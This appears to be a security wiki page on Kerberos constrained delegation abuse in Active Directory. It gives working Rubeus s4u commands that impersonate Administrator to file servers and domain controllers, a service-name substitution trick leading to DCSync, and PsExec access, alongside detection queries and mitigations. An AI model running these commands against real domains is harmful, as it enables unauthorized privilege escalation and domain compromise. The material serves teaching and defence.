Constrained Delegation Abuse
ATT&CK: T1558 — Steal or Forge Kerberos Tickets
Constrained delegation allows a service account to impersonate specific users to specific services (unlike unconstrained delegation which allows impersonation to any service). When misconfigured or improperly scoped, it enables privilege escalation to service administrators.
Constrained Delegation vs Unconstrained
| Unconstrained | Constrained | Resource-Based Constrained | |
|---|---|---|---|
| Config location | Account attribute | Account attribute | Target resource attribute |
| Scope | Any service | Listed services only | Resources that trust the account |
| Attack surface | TGT cached in memory | S4U2Self + S4U2Proxy abuse | RBCD |
| Introduced | Windows 2000 | Windows Server 2003 | Windows Server 2012 |
S4U Extensions
Constrained delegation works via two Kerberos extensions:
| Extension | Purpose |
|---|---|
| S4U2Self (Service-for-User-to-Self) | Service requests a ticket to itself on behalf of any user — even without that user's password |
| S4U2Proxy (Service-for-User-to-Proxy) | Service uses the S4U2Self ticket to request a TGS to the allowed target services |
S4U2Self allows a service to get a forwardable ticket for any user — including Domain Admins — as long as the service account has the TrustedToAuthForDelegation flag set.
Finding Constrained Delegation Accounts
# PowerView - accounts configured for constrained delegation
Get-DomainUser -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto
# Built-in
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation
The msDS-AllowedToDelegateTo attribute lists the SPNs the account can delegate to, e.g.:
cifs/FILESERVER01.domain.com
host/FILESERVER01.domain.com
Exploitation
Step 1: Compromise the Service Account
If we control a service account with constrained delegation, we can impersonate any user to the allowed services.
# Rubeus - S4U chain: impersonate Administrator to cifs/FILESERVER01
.\Rubeus.exe s4u /user:svc_webapp /password:P@ssw0rd /impersonateuser:Administrator /msdsspn:cifs/FILESERVER01 /ptt
# If we have the NTLM hash instead of password:
.\Rubeus.exe s4u /user:svc_webapp /rc4:<ntlm_hash> /impersonateuser:Administrator /msdsspn:cifs/FILESERVER01 /ptt
Step 2: Use the Ticket
After /ptt (pass-the-ticket), the ticket is injected into the current session:
# Access the share as Administrator
dir \\FILESERVER01\C$
# Or run commands
PsExec.exe \\FILESERVER01 cmd.exe
Alternate Target — Protocol Transition for Host SPN
If the service is allowed to delegate to host/DCNAME or cifs/DCNAME, escalation to DC becomes possible.
# Escalate to DC via cifs
.\Rubeus.exe s4u /user:svc_app /rc4:<hash> /impersonateuser:Administrator /msdsspn:"cifs/DC01.domain.com" /ptt
Service Name Substitution
An important nuance: the TGS from S4U2Proxy has a service name embedded in it. Some services only check the hostname portion — meaning a ticket for cifs/FILESERVER01 can sometimes be used as if it were ldap/FILESERVER01 by changing the service class in the ticket.
# Rubeus - request cifs ticket but use it for LDAP (service name substitution)
.\Rubeus.exe s4u /user:svc_app /rc4:<hash> /impersonateuser:Administrator /msdsspn:"cifs/DC01" /altservice:ldap /ptt
This technique enables DCSync if ldap/DC01 is in the delegation list (or via service name substitution from cifs).
Detection
Event IDs
| Event | Signal |
|---|---|
| 4769 with TicketOptions including delegation flags | S4U2Proxy ticket request |
| 4648 | Explicit credential logon from service account |
| S4U2Self auditing (Event 4769 with TransmittedServices) | S4U2Self invocation |
KQL Detection
// Detect S4U2Proxy: tickets requested using constrained delegation
SecurityEvent
| where EventID == 4769
| where ServiceName !endswith "$"
| where TicketOptions has_any ("0x20000", "0x40000")
// Forwarded or proxy-forwardable
| summarize DistinctTargets = dcount(ServiceName) by AccountName, bin(TimeGenerated, 1h)
| where DistinctTargets > 3
Behavioral Indicator
A service account authenticating to services it is not normally seen accessing (even if those services are in its delegation list) is suspicious, especially during off-hours.
Mitigation
| Control | Effect |
|---|---|
Audit msDS-AllowedToDelegateTo across all accounts | Find over-broad delegation configs |
Never add host/DC or cifs/DC to delegation list | Prevent escalation to DCs |
| Protected Users group | Accounts cannot be impersonated via delegation |
| "Account is sensitive and cannot be delegated" | Prevents any delegation impersonation of that account |
| Prefer RBCD over constrained delegation | RBCD is more controllable |
Cross-Links
| Topic | Link |
|---|---|
| Unconstrained Delegation | unconstrained-delegation |
| RBCD | rbcd |
| Kerberos | kerberos |